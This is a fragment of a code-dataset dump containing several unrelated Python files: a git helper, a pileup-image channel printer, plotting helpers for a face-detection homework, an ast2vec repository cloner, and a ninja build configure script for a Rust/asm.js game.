None\n\n\ndef get_repository_sha(path,\n revision='HEAD'):\n \"\"\"\n Get the sha from a repository path and revision\n\n Args:\n path(string): The path to the repository to open\n revision(string): the revision to get the sha of\n\n Returns:\n string: The sha of the revision, None type if\n not found\n \"\"\"\n try:\n repository = pygit2.Repository(path)\n sha = repository.revparse_single(revision).oid\n return sha.__str__()\n except KeyError as e:\n shaker.libs.logger.Logger().debug(\"github::get_repository_sha: \"\n \"Error opening repository: %s\"\n % (e))\n return None\n","sub_path":"shaker/libs/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":40042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"596276179","text":"import os\nimport argparse\nfrom PIL import Image, ImageOps\nimport numpy as np\nimport math\n\n\ndef get_base_by_color(base):\n \"\"\"\n Get color based on a base.\n - Uses different band of the same channel.\n :param base:\n :return:\n \"\"\"\n if base >= 250.0:\n return 'A'\n if base >= 180.0:\n return 'G'\n if base >= 100.0:\n return 'C'\n if base >= 30.0:\n return 'T'\n if base >= 5.0:\n return '*'\n\n\ndef get_alt_support_by_color(is_in_support):\n \"\"\"\n ***NOT USED YET***\n :param is_in_support:\n :return:\n \"\"\"\n if is_in_support == 254.0:\n return 1\n elif is_in_support == 152.0:\n return 0\n\n\ndef get_quality_by_color(map_quality):\n \"\"\"\n Get a color spectrum given mapping quality\n :param map_quality: value of mapping quality\n :return:\n \"\"\"\n color = math.floor(((map_quality / 254) * 9))\n return color\n\ndef get_match_ref_color(is_match):\n \"\"\"\n Get color for base matching to reference\n :param is_match: If true, base matches to reference\n :return:\n \"\"\"\n if is_match == 50:\n return 1\n elif is_match == 254:\n return 0\n\n\ndef get_strand_color(is_rev):\n \"\"\"\n Get color for forward and reverse reads\n :param is_rev: True if read is reversed\n :return:\n \"\"\"\n if is_rev == 240.0:\n return 1\n else:\n return 0\n\n\ndef get_cigar_by_color(cigar_code):\n \"\"\"\n ***NOT USED YET***\n :param is_in_support:\n :return:\n \"\"\"\n if cigar_code == 254:\n return 0\n if cigar_code == 152:\n return 1\n if cigar_code == 76:\n return 2\n\n\ndef analyze_it(img):\n file = img\n img = Image.open(file)\n\n shape = (300, 300, 7)\n np_array_of_img = np.array(img.getdata())\n\n img = np.reshape(np_array_of_img, shape)\n img = np.transpose(img, (0, 1, 2))\n print(\"BASE CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][0] != 0:\n print(get_base_by_color(img[i][j][0]), end='')\n else:\n print(' ',end='')\n print()\n print(\"CIGAR CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][6] != 0:\n print(get_cigar_by_color(img[i][j][6]), end='')\n else:\n print(' ', end='')\n print()\n print(\"SUPPORT CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][5] != 0:\n print(get_alt_support_by_color(img[i][j][5]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"BASE QULAITY CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][1] != 0:\n print(get_quality_by_color(img[i][j][1]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"MAP QUALITY CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][2] != 0:\n print(get_quality_by_color(img[i][j][2]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"MISMATCH CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][4] != 0:\n print(get_match_ref_color(img[i][j][4]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"STRAND CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][3] != 0:\n print(get_strand_color(img[i][j][3]), end='')\n else:\n print(' ', end='')\n print()\n\n\ndef analyze_np_array(img):\n img = img.numpy() * 255\n # img = np.reshape(np_array_of_img, shape)\n # img = np.transpose(img, (0, 1, 2))\n print(\"BASE CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[0][i][j] != 0:\n print(get_base_by_color(img[0][i][j]), end='')\n else:\n print(' ',end='')\n print()\n\n print(\"CIGAR CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[6][i][j] != 0:\n print(get_cigar_by_color(img[6][i][j]), end='')\n else:\n print(' ', end='')\n print()\n print(\"SUPPORT CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[5][i][j] != 0:\n print(get_alt_support_by_color(img[5][i][j]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"BASE QULAITY CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[1][i][j] != 0:\n print(get_quality_by_color(img[1][i][j]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"MAP QUALITY CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[2][i][j] != 0:\n print(get_quality_by_color(img[2][i][j]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"MISMATCH CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[4][i][j] != 0:\n print(get_match_ref_color(img[4][i][j]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"STRAND CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[3][i][j] != 0:\n print(get_strand_color(img[3][i][j]), end='')\n else:\n print(' ', end='')\n print()\n\nif __name__ == '__main__':\n \"\"\"\n Processes arguments and performs tasks to generate the pileup.\n \"\"\"\n\n parser = argparse.ArgumentParser()\n parser.register(\"type\", \"bool\", lambda v: v.lower() == \"true\")\n parser.add_argument(\n \"--img\",\n type=str,\n required=True,\n help=\"Path to the image.\"\n )\n FLAGS, not_parsed_flags = parser.parse_known_args()\n # make output directory if not already created\n analyze_it(FLAGS.img)","sub_path":"image_analyzer.py","file_name":"image_analyzer.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"403761762","text":"\"\"\"plot and visualization functions for cs131 hw7\"\"\"\nimport matplotlib.patches as patches\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom skimage.transform import downscale_local_mean, rescale, resize\n\n\ndef plot_part1(avg_face, face_hog):\n \"\"\"plot average face and hog representatitons of face.\"\"\"\n plt.subplot(1, 2, 1)\n plt.imshow(avg_face)\n plt.axis('off')\n plt.title('average face image')\n\n plt.subplot(1, 2, 2)\n plt.imshow(face_hog)\n plt.title('hog representation of face')\n plt.axis('off')\n\n plt.show()\n\n\ndef plot_part2(image, r, c, response_map_resized, response_map, winW, winH):\n \"\"\"plot window with highest hog score and heatmap.\"\"\"\n fig, (ax1, ax2, ax3) = plt.subplots(3, figsize=(10,15))\n\n im = ax1.imshow(image)\n rect = patches.Rectangle((c - winW // 2, r - winH // 2),\n winW,\n winH,\n linewidth=1,\n edgecolor='r',\n facecolor='none')\n ax1.add_patch(rect)\n fig.colorbar(im, ax=ax1)\n\n ax2.set_title('Sliding Window Response Map')\n im = ax2.imshow(response_map_resized, cmap='viridis', interpolation='nearest')\n fig.colorbar(im, ax=ax2)\n\n ax3.set_title('Unresized Sliding Window Response Map')\n im = ax3.imshow(response_map, cmap='viridis', interpolation='nearest')\n fig.colorbar(im, ax=ax3)\n plt.tight_layout()\n plt.show()\n\n\ndef plot_part3_1(images):\n \"\"\"plot image pyramid.\"\"\"\n sum_r = 0\n sum_c = 0\n for i, result in enumerate(images):\n (scale, image) = result\n if i == 0:\n sum_c = image.shape[1]\n sum_r += image.shape[0]\n\n composite_image = np.zeros((sum_r, sum_c))\n\n pointer = 0\n for i, result in enumerate(images):\n (scale, image) = result\n composite_image[pointer:pointer +\n image.shape[0], :image.shape[1]] = image\n pointer += image.shape[0]\n\n plt.imshow(composite_image)\n plt.axis('off')\n plt.title('Image Pyramid')\n plt.show()\n\n\ndef plot_part3_2(image, max_scale, winW, winH, maxc, maxr, max_response_map):\n \"\"\"plot window with highest hog score and heatmap.\"\"\"\n fig, (ax1, ax2) = plt.subplots(2, figsize=(10,10))\n im = ax1.imshow(rescale(image, max_scale))\n rect = patches.Rectangle((maxc - winW // 2, maxr - winH // 2),\n winW,\n winH,\n linewidth=1,\n edgecolor='r',\n facecolor='none')\n ax1.add_patch(rect)\n fig.colorbar(im, ax=ax1)\n\n ax2.set_title('Pyramid Score Response Map')\n im = ax2.imshow(max_response_map, cmap='viridis', interpolation='nearest')\n fig.colorbar(im, ax=ax2)\n plt.tight_layout()\n plt.show()\n\n\ndef plot_part4(avg, hog, part_name):\n \"\"\"plot average and hog representatitons of deformable parts.\"\"\"\n plt.subplot(1, 3, 1)\n plt.imshow(avg)\n plt.axis('off')\n plt.title('average ' + part_name + ' image')\n\n plt.subplot(1, 3, 2)\n plt.imshow(hog)\n plt.axis('off')\n plt.title('average hog image')\n plt.show()\n\n\ndef plot_part5_1(response_map):\n \"\"\"plot heatmaps.\"\"\"\n fig, ax = plt.subplots(1, figsize=(10,5))\n im = ax.imshow(response_map, cmap='viridis', interpolation='nearest')\n fig.colorbar(im, ax=ax)\n plt.show()\n\n\ndef plot_part5_2_face(face_heatmap_shifted):\n \"\"\"plot heatmaps.\"\"\"\n fig, ax = plt.subplots(1, figsize=(10,5))\n im = ax.imshow(face_heatmap_shifted, cmap='viridis', interpolation='nearest')\n fig.colorbar(im, ax=ax)\n plt.show()\n\n\ndef plot_part5_2_parts(lefteye_heatmap_shifted, righteye_heatmap_shifted,\n nose_heatmap_shifted, mouth_heatmap_shifted):\n \"\"\"plot heatmaps.\"\"\"\n f, axarr = plt.subplots(2, 2, figsize=(14,7))\n\n im = axarr[0, 0].imshow(\n lefteye_heatmap_shifted, cmap='viridis', interpolation='nearest')\n f.colorbar(im, ax=axarr[0,0])\n\n im = axarr[0, 1].imshow(\n righteye_heatmap_shifted, cmap='viridis', interpolation='nearest')\n f.colorbar(im, ax=axarr[0,1])\n\n im = axarr[1, 0].imshow(\n nose_heatmap_shifted, cmap='viridis', interpolation='nearest')\n f.colorbar(im, ax=axarr[1,0])\n\n im = axarr[1, 1].imshow(\n mouth_heatmap_shifted, cmap='viridis', interpolation='nearest')\n f.colorbar(im, ax=axarr[1,1])\n\n plt.show()\n\n\ndef plot_part6_1(winH, winW, heatmap, image, i, j):\n \"\"\"plot heatmaps and optimal window.\"\"\"\n fig, (ax1, ax2) = plt.subplots(2, figsize=(10,10))\n im = ax1.imshow(resize(image, heatmap.shape))\n rect = patches.Rectangle((j - winW // 2, i - winH // 2),\n winW,\n winH,\n linewidth=1,\n edgecolor='r',\n facecolor='none')\n ax1.add_patch(rect)\n fig.colorbar(im, ax=ax1)\n\n ax2.set_title('Gaussian Filter Heatmap')\n im = ax2.imshow(heatmap, cmap='viridis', interpolation='nearest')\n rect = patches.Rectangle((j - winW // 2, i - winH // 2),\n winW,\n winH,\n linewidth=1,\n edgecolor='r',\n facecolor='none')\n ax2.add_patch(rect)\n fig.colorbar(im, ax=ax2)\n plt.tight_layout()\n plt.show()\n","sub_path":"fall_2020/hw6_release/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"79004689","text":"from functools import partial\nimport json\nimport logging\nfrom multiprocessing.dummy import Pool\nimport os\nimport shutil\nimport subprocess\n\n\nclass LinguistFailedError(Exception):\n \"\"\"\n Raised when we fail to classify the source files.\n \"\"\"\n pass\n\n\nclass RepoCloner:\n \"\"\"\n Clones repositories from provided urls / files with urls.\n Use enry to classify files and delete redundant files if needed.\n \"\"\"\n def __init__(self, redownload, linguist=None, languages=None,\n log_level=logging.INFO, num_threads=1):\n self._log = logging.getLogger(\"repo_cloner\")\n self._log.setLevel(log_level)\n self._is_enry = False\n self._languages = languages\n self._linguist = None\n self._num_threads = num_threads\n self._redownload = redownload\n if linguist or languages:\n self.find_linguist(linguist)\n\n def clone_repo(self, git_url, ignore, target_dir):\n \"\"\"\n Clones repository into a separate directory inside of the target one.\n\n :param git_url: Url of Git repository.\n :param ignore: Flag for ignoring Git failures.\n :param target_dir: Target directory. New directory will be created inside of target_dir.\n :return: Path to downloaded Git repository.\n \"\"\"\n git_url = self._prepare_repo_url(git_url)\n\n try:\n repo_dir = self._prepare_repo_dir(git_url, target_dir)\n except FileExistsError as e:\n self._log.warning(\"%s already cloned, skipping.\", git_url)\n return\n\n env = os.environ.copy()\n env[\"GIT_TERMINAL_PROMPT\"] = \"0\" # force Git not to ask anything\n self._log.info(\"Cloning from %s...\", git_url)\n\n try:\n subprocess.check_output([\"git\", \"clone\", \"--depth=1\", git_url, repo_dir],\n env=env, stdin=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n shutil.rmtree(repo_dir, ignore_errors=True)\n self._log.error(\"Git failed to clone repo. git stderr:\\n\\t\" +\n \"\\n\\t\".join(e.output.decode(\"utf8\").split(\"\\n\")))\n if not ignore:\n raise e from None\n else:\n return\n except Exception as e:\n shutil.rmtree(repo_dir, ignore_errors=True)\n self._log.error(\"Unknown error in RepoCloner. Git failed to clone repo.\")\n raise e from None\n\n self._log.info(\"Finished cloning %s\", git_url)\n return repo_dir\n\n def classify_repo(self, repo_dir: str) -> dict:\n \"\"\"\n Classify files in a repository using provided linguist.\n\n :param repo_dir: Path to repository directory.\n :return: linguist output loaded from JSON.\n \"\"\"\n if not self._linguist:\n raise LinguistFailedError(\"Linguist is not set - cannot classify the files\")\n\n self._log.info(\"Classifying the files...\")\n repo_dir = os.path.abspath(repo_dir)\n cmdline = [self._linguist]\n if self._is_enry:\n cmdline += [\"-json\", repo_dir]\n else:\n cmdline += [repo_dir, \"--json\"]\n try:\n bjson = subprocess.check_output(cmdline)\n except subprocess.CalledProcessError:\n self._log.error(\"Couldn't classify files in %s\", repo_dir)\n raise LinguistFailedError() from None\n classified = json.loads(bjson.decode(\"utf8\"))\n self._log.info(\"Result: %s\", {k: len(v) for k, v in classified.items()})\n return classified\n\n def cleanup_repo(self, classified: dict, repo_dir: str) -> None:\n \"\"\"\n Delete files not classified by linguist (if some languages were specified then only them\n are preserved).\n\n :param classified: enry output loaded from JSON.\n :param repo_dir: Path to repository directory.\n :return:\n \"\"\"\n if self._languages:\n self._log.info(\"Removing files with languages not in (%s)\",\n \",\".join(self._languages))\n languages = self._languages\n else:\n self._log.info(\"Removing files not classified by enry.\")\n languages = classified.keys()\n\n allowed_files = set(str.encode(os.path.join(repo_dir, fname)) for lang in languages\n if lang in classified for fname in classified[lang])\n\n for root, dirnames, filenames in os.walk(str.encode(repo_dir), topdown=False):\n for filename in filenames:\n full_filename = os.path.join(root, filename)\n if full_filename not in allowed_files:\n os.remove(full_filename)\n for dirname in dirnames:\n full_dirname = os.path.join(root, dirname)\n if os.path.islink(full_dirname):\n os.unlink(full_dirname)\n elif not os.listdir(full_dirname):\n os.rmdir(full_dirname)\n\n def clone_repos(self, inputs, output, ignore):\n with Pool(self._num_threads) as pool:\n pool.map(partial(self.process_repo, ignore=ignore, target_dir=output),\n self.generate_repo_urls(inputs))\n\n def process_repo(self, git_url: str, ignore: bool, target_dir: str) -> None:\n repo_dir = self.clone_repo(git_url, ignore, target_dir)\n if repo_dir is None or self._linguist is None:\n return\n classified = self.classify_repo(repo_dir)\n if classified:\n self.cleanup_repo(classified, repo_dir)\n\n @staticmethod\n def generate_repo_urls(inputs):\n \"\"\"\n Parse provided inputs.\n\n :param inputs: List of files and/or Git urls.\n :return: Generator of git urls.\n \"\"\"\n for item in inputs:\n if os.path.isfile(item):\n with open(item, encoding=\"utf8\") as f:\n for line in f:\n yield line.rstrip()\n else:\n yield item\n\n def find_linguist(self, linguist):\n if linguist is None:\n linguist = shutil.which(\"enry\", path=os.getcwd() + \":\" + os.getenv(\"PATH\", os.defpath))\n full_path = shutil.which(linguist)\n if not full_path:\n raise FileNotFoundError(\"%s was not found. Install it: python3 -m ast2vec enry\" %\n linguist)\n self._linguist = linguist\n with open(full_path, \"rb\") as fin:\n # Check if we're using https://github.com/github/linguist\n self._is_enry = fin.read(15) != b\"#!/usr/bin/ruby\"\n\n def _prepare_repo_dir(self, git_url: str, target_dir: str) -> str:\n \"\"\"\n Prepare directory for saving Git repository, i.e. create / cleanup if necessary.\n\n :param git_url: Url of Git repository.\n :param target_dir: Parent directory for Git repository.\n :return: Path to prepared directory.\n \"\"\"\n git_ending = \".git\"\n repo_name = \"&\".join(git_url.rsplit(\"/\", maxsplit=2)[-2:])\n if repo_name.endswith(git_ending):\n repo_name = repo_name[:-len(git_ending)]\n site_start = git_url.find(\"//\")\n site_end = git_url.find(\"/\", site_start + 2)\n repo_name += \"_\" + git_url[site_start + 2:site_end]\n repo_dir = os.path.join(target_dir, repo_name)\n\n if os.path.exists(repo_dir) and self._redownload:\n self._log.info(\"%s already downloaded to %s, will download it again\",\n git_url, repo_dir)\n shutil.rmtree(repo_dir)\n\n os.makedirs(repo_dir)\n return repo_dir\n\n @staticmethod\n def _prepare_repo_url(git_url: str) -> str:\n \"\"\"\n Prepare name of repository for operations with git.\n Remove '\\n', '/' and '\\' in the end of string.\n Add 'https://' in the beginning if necessary.\n\n :param reponame: Raw Git url of repository.\n :return: Clean Git url.\n \"\"\"\n bad_endings = \"\\n\\r\\\\/\"\n git_url = git_url.rstrip(bad_endings)\n if not git_url.startswith(\"git://\") and not git_url.startswith(\"https://\") and \\\n not git_url.startswith(\"http://\"):\n git_url = \"https://\" + git_url\n return git_url\n\n\ndef clone_repositories(args):\n \"\"\"\n Invokes RepoCloner(\\*\\*args).clone_repos() on the specified input.\n\n :param args: :class:`argparse.Namespace` with \"input\", \"output\" and \"ignore\". \"input\" is a \\\n list of files and/or Git urls. \"output\" is the path to directory for storing \\\n all repositories. \"ignore\" is a flag for specifying to ignore Git clone problems.\n :return: None\n \"\"\"\n clone_args = _sanitize_kwargs(args)\n RepoCloner(**clone_args).clone_repos(args.input, args.output, args.ignore)\n\n\ndef _sanitize_kwargs(args):\n clone_args = getattr(args, \"__dict__\", args).copy()\n blacklist = (\"command\", \"ignore\", \"input\", \"handler\", \"output\")\n for arg in blacklist:\n clone_args.pop(arg, None)\n clone_args[\"num_threads\"] = clone_args.pop(\"threads\")\n return clone_args\n","sub_path":"ast2vec/cloning.py","file_name":"cloning.py","file_ext":"py","file_size_in_byte":9095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"555677699","text":"import argparse\nimport os\nimport subprocess\nimport sys\n\nfrom configure import checks\nfrom configure.gen import native, asmjs, data, js, dist, scripts\nfrom configure.template import template\n\n\ndef build_parser():\n args = argparse.ArgumentParser()\n\n args.add_argument('--build-dir', default=None,\n help='directory to store build files')\n args.add_argument('--dist-dir', default=None,\n help='directory to store distribution image')\n\n args.add_argument('--data-only', action='store_true', default=False,\n help='generate data files only; don\\'t compile any code')\n args.add_argument('--use-prebuilt',\n help='use prebuild versions of the named files/directories')\n args.add_argument('--prebuilt-dir', default=None,\n help='directory containing a previously compiled version')\n args.add_argument('--reconfigure', action='store_true', default=False,\n help='reuse cached configuration info when possible')\n args.add_argument('--mods',\n help='list of mods to include in the compiled game')\n\n args.add_argument('--debug', action='store_true', default=False,\n help='produce a debug build')\n args.add_argument('--release', action='store_false', dest='debug',\n help='produce a release build (default)')\n\n args.add_argument('--rust-home', default='../rust',\n help='path to rust-lang/rust checkout')\n args.add_argument('--bitflags-home', default='../bitflags',\n help='path to rust-lang/bitflags checkout')\n args.add_argument('--rust-extra-libdir', default=None,\n help='additional search directory for Rust libraries')\n args.add_argument('--rust-lib-externs', default='',\n help='list of --extern flags for locating Rust libraries')\n args.add_argument('--emscripten-fastcomp-prefix', default=None,\n help='path to kripken/emscripten-fastcomp build/install directory')\n\n args.add_argument('--rustc',\n help='name of the Rust compiler binary')\n args.add_argument('--cc',\n help='name of the C compiler binary')\n args.add_argument('--cxx',\n help='name of the C++ compiler binary')\n args.add_argument('--python3',\n help='name of the Python 3 interpreter binary')\n args.add_argument('--python3-config',\n help='name of the Python 3 build configuration helper binary')\n args.add_argument('--closure-compiler',\n help='name of the Closure Compiler binary')\n args.add_argument('--yui-compressor',\n help='name of the YUI Compressor binary')\n\n args.add_argument('--force', action='store_true', default=False,\n help='proceed even if there are configuration errors')\n\n args.add_argument('--cflags',\n help='extra flags for the C compiler')\n args.add_argument('--cxxflags',\n help='extra flags for the C++ compiler')\n args.add_argument('--ldflags',\n help='extra flags for the C/C++ linker')\n\n args.add_argument('--with-server-gui', action='store_true',\n help='include server_gui.py in the build')\n\n return args\n\n\nclass Info(object):\n def __init__(self, args):\n self._args = args\n\n script_dir = os.path.dirname(sys.argv[0])\n if script_dir == '':\n self.root_dir = '.'\n else:\n self.root_dir = os.path.normpath(os.path.join(script_dir, '..', '..'))\n\n in_tree = self.root_dir == '.' or self.root_dir == os.getcwd()\n\n if args.build_dir is None:\n self.build_dir = 'build' if in_tree else '.'\n else:\n self.build_dir = args.build_dir\n\n if args.dist_dir is None:\n self.dist_dir = 'dist' if in_tree else os.path.join(self.build_dir, 'dist')\n else:\n self.dist_dir = args.dist_dir\n\n def __getattr__(self, k):\n return getattr(self._args, k)\n\n\ndef header(i):\n def b(*args):\n return os.path.normpath(os.path.join(i.build_dir, *args))\n\n return template('''\n # Root of the source tree. This used to be called $src, but that would\n # be confusing now that $root/src is an actual directory.\n root = %{os.path.normpath(i.root_dir)}\n # Note: (1) `build` is a ninja keyword; (2) `builddir` is a special\n # variable that determines where `.ninja_log` is stored.\n builddir = %{os.path.normpath(i.build_dir)}\n dist = %{os.path.normpath(i.dist_dir)}\n prebuilt = %{os.path.normpath(i.prebuilt_dir or '')}\n\n _exe = %{'' if not i.win32 else '.exe'}\n _so = %{'.so' if not i.win32 else '.dll'}\n _a = .a\n\n b_native = %{b('native')}\n b_asmjs = %{b('asmjs')}\n b_data = %{b('data')}\n b_js = %{b('js')}\n b_scripts = %{b('scripts')}\n\n mods = %{','.join(i.mod_list)}\n\n rustc = %{i.rustc}\n cc = %{i.cc}\n cxx = %{i.cxx}\n python3 = %{i.python3}\n closure_compiler = %{i.closure_compiler}\n yui_compressor = %{i.yui_compressor}\n\n user_cflags = %{i.cflags}\n user_cxxflags = %{i.cxxflags}\n user_ldflags = %{i.ldflags}\n ''', os=os, **locals())\n\n\ndef fix_bitflags(src_out, src_in):\n return template('''\n rule fix_bitflags_src\n command = $\n echo '#![feature(no_std)]' >$out && $\n echo '#![no_std]' >>$out && $\n cat $in >> $out\n description = PATCH bitflags.rs\n\n build %src_out: fix_bitflags_src %src_in\n ''', **locals())\n\n\nif __name__ == '__main__':\n parser = build_parser()\n args = parser.parse_args(sys.argv[1:])\n\n log = open('config.log', 'w')\n log.write('Arguments: %r\\n\\n' % (sys.argv[1:],))\n\n i, ok = checks.run(args, log)\n if not ok:\n if i.force:\n print('Ignoring errors due to --force')\n else:\n sys.exit(1)\n\n if i.python3_config is not None:\n py_includes = subprocess.check_output((i.python3_config, '--includes')).decode().strip()\n py_ldflags = subprocess.check_output((i.python3_config, '--ldflags')).decode().strip()\n else:\n py_includes = None\n py_ldflags = None\n\n if i.debug:\n dist_manifest_base = 'debug.manifest'\n else:\n dist_manifest_base = 'release.manifest'\n\n dist_manifest = os.path.join(i.root_dir, 'mk', dist_manifest_base)\n common_manifest = os.path.join(i.root_dir, 'mk', 'common.manifest')\n maybe_data_filter = os.path.join(i.root_dir, 'mk', 'data_files.txt') \\\n if i.data_only else None\n\n dist_extra = []\n if i.with_server_gui:\n dist_extra.append(('server_gui.py', '$root/util/server_gui.py'))\n\n content = header(i)\n content += '\\n\\n'.join((\n '',\n dist.rules(i),\n ))\n\n if not i.data_only:\n content += '\\n\\n'.join((\n '',\n '# Native',\n native.rules(i),\n native.rust('syntax_exts', 'dylib', (), extra_flags='-C prefer-dynamic'),\n native.rust('physics', 'lib', ()),\n native.rust('server_types', 'lib', ('physics',)),\n native.rust('server_config', 'lib', ('server_types',)),\n native.rust('server_extra', 'lib', ('server_types',)),\n native.rust('server_util', 'lib', ('server_types',)),\n native.rust('server_world_types', 'lib', ('server_types',)),\n native.rust('server_bundle', 'lib',\n ('physics', 'server_config', 'server_extra', 'server_types',\n 'server_util', 'server_world_types')),\n native.rust('server_bundle', 'staticlib',\n ('physics', 'server_config', 'server_extra', 'server_types',\n 'server_util', 'server_world_types'),\n extra_flags='--cfg ffi'),\n native.rust('terrain_gen_algo', 'lib', ('server_types',), build_type='release'),\n native.rust('terrain_gen', 'lib',\n ('physics', 'server_config', 'server_types', 'server_util', 'terrain_gen_algo'),\n # Slow terrain gen algorithms cause serious problems in debug\n # builds (3000+ ms to generate each chunk).\n build_type='release'),\n native.rust('backend', 'bin',\n ('physics', 'terrain_gen',\n 'server_bundle', 'server_config', 'server_extra',\n 'server_types', 'server_util', 'server_world_types',),\n dyn_deps=('syntax_exts',),\n src_file='$root/src/server/main.rs'),\n native.cxx('wrapper', 'bin',\n ('$root/src/wrapper/%s' % f\n for f in os.listdir(os.path.join(i.root_dir, 'src', 'wrapper'))\n if f.endswith('.cpp')),\n cxxflags='-DWEBSOCKETPP_STRICT_MASKING',\n ldflags='-static',\n # TODO: detect these lib flags\n libs='-lboost_system -lpthread' if not i.win32 else\n '-lboost_system-mt -lpthread -lwsock32 -lws2_32'),\n native.cxx('outpost_savegame', 'shlib',\n ('$root/util/savegame_py/%s' % f\n for f in os.listdir(os.path.join(i.root_dir, 'util/savegame_py'))\n if f.endswith('.c')),\n cflags=py_includes,\n ldflags=py_ldflags,\n ),\n\n native.rust('terrain_gen_ffi', 'staticlib',\n ('terrain_gen', 'server_config', 'server_types'),\n src_file='$root/src/test_terrain_gen/ffi.rs'),\n native.cxx('outpost_terrain_gen', 'shlib',\n ('$root/src/test_terrain_gen/py.c',),\n cflags=py_includes,\n ldflags=py_ldflags,\n link_extra=['$b_native/libterrain_gen_ffi$_a'],\n ),\n\n 'build pymodules: phony '\n '$b_native/outpost_savegame$_so '\n '$b_native/outpost_terrain_gen$_so',\n\n native.rust('equip_sprites_render', 'dylib',\n ('physics',),\n src_file='$root/src/gen/equip_sprites/render.rs'),\n dist.copy('$b_native/libequip_sprites_render$_so',\n '$b_native/equip_sprites_render$_so'),\n\n '# Asm.js',\n asmjs.rules(i),\n asmjs.rlib('core', (), i.rust_libcore_src),\n asmjs.rlib('alloc', ('core',), i.rust_liballoc_src),\n asmjs.rlib('rustc_unicode', ('core',), i.rust_librustc_unicode_src),\n asmjs.rlib('collections', ('core', 'alloc', 'rustc_unicode'),\n i.rust_libcollections_src),\n asmjs.rlib('asmrt', ('core',)),\n asmjs.rlib('asmmalloc', ('core', 'asmrt')),\n asmjs.rlib('fakestd', ('core', 'alloc', 'rustc_unicode', 'collections',\n 'asmrt', 'asmmalloc')),\n asmjs.rlib('bitflags', ('core',), i.rust_libbitflags_src),\n asmjs.rlib('physics', ('fakestd', 'bitflags')),\n asmjs.rlib('client_ui_atlas', ('core', 'physics',), '$b_data/ui_atlas.rs'),\n asmjs.rlib('client_fonts', ('core',), '$b_data/fonts_metrics.rs'),\n asmjs.rlib('client', ('fakestd', 'physics',\n 'client_ui_atlas', 'client_fonts')),\n asmjs.asmlibs('asmlibs',\n '$root/src/asmlibs/lib.rs',\n ('core', 'collections', 'asmrt', 'asmmalloc', 'physics', 'client'),\n '$root/src/asmlibs/exports.txt',\n '$root/src/asmlibs/template.js'),\n\n '# Javascript',\n js.rules(i),\n js.compile(i, '$b_js/outpost.js', '$root/src/client/js/main.js'),\n js.minify(i, '$b_js/asmlibs.js', '$b_asmjs/asmlibs.js'),\n js.compile(i, '$b_js/configedit.js', '$root/src/client/js/configedit.js'),\n\n '# uvedit',\n asmjs.asmlibs('uvedit_asm',\n '$root/src/uvedit/lib.rs',\n ('core', 'collections', 'asmrt', 'asmmalloc', 'physics'),\n '$root/src/uvedit/asm_exports.txt',\n '$root/src/uvedit/asm_template.js'),\n js.minify(i, '$b_js/uvedit_asm.js', '$b_asmjs/uvedit_asm.js'),\n js.compile(i, '$b_js/uvedit.js', '$root/src/uvedit/main.js'),\n ))\n\n content += '\\n\\n'.join((\n '',\n '# Data',\n data.rules(i),\n data.font('name', '$root/assets/misc/NeoSans.png'),\n data.font('title', '$root/assets/misc/Alagard.png',\n extra_args='--no-shadow --color=0xdeeed6'),\n data.font('hotbar', '$root/assets/misc/hotbar-font.png',\n charset_args='--char-list=\"0123456789.k\"'),\n data.font_stack('$b_data/fonts', ('name', 'hotbar', 'title')),\n data.day_night('$b_data/day_night.json', '$root/assets/misc/day_night_pixels.png'),\n data.server_json('$b_data/server.json'),\n data.ui_atlas('$b_data', '$root/assets/ui_gl/png'),\n data.process(),\n data.binary_defs('$b_data/client_data.bin'),\n data.pack(),\n data.credits('$b_data/credits.html'),\n\n '# Server-side scripts',\n scripts.rules(i),\n scripts.copy_mod_scripts(i.mod_list),\n\n '# Distribution',\n # dist rules go at the top so other parts can refer to `dist.copy`\n dist.from_manifest(common_manifest, dist_manifest,\n filter_path=maybe_data_filter,\n exclude_names=i.use_prebuilt,\n extra=dist_extra),\n\n 'default $builddir/dist.stamp',\n '', # ensure there's a newline after the last command\n ))\n\n with open('build.ninja', 'w') as f:\n f.write(content)\n\n print('Generated build.ninja')\n print('Run `ninja` to build')\n","sub_path":"mk/configure/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":13661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"397453885","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpide\n\nThis is a temporary script file.\n\"\"\"\nx=6\ny=9\n\nwhile x>0 and y>0:\n x=x-1\n 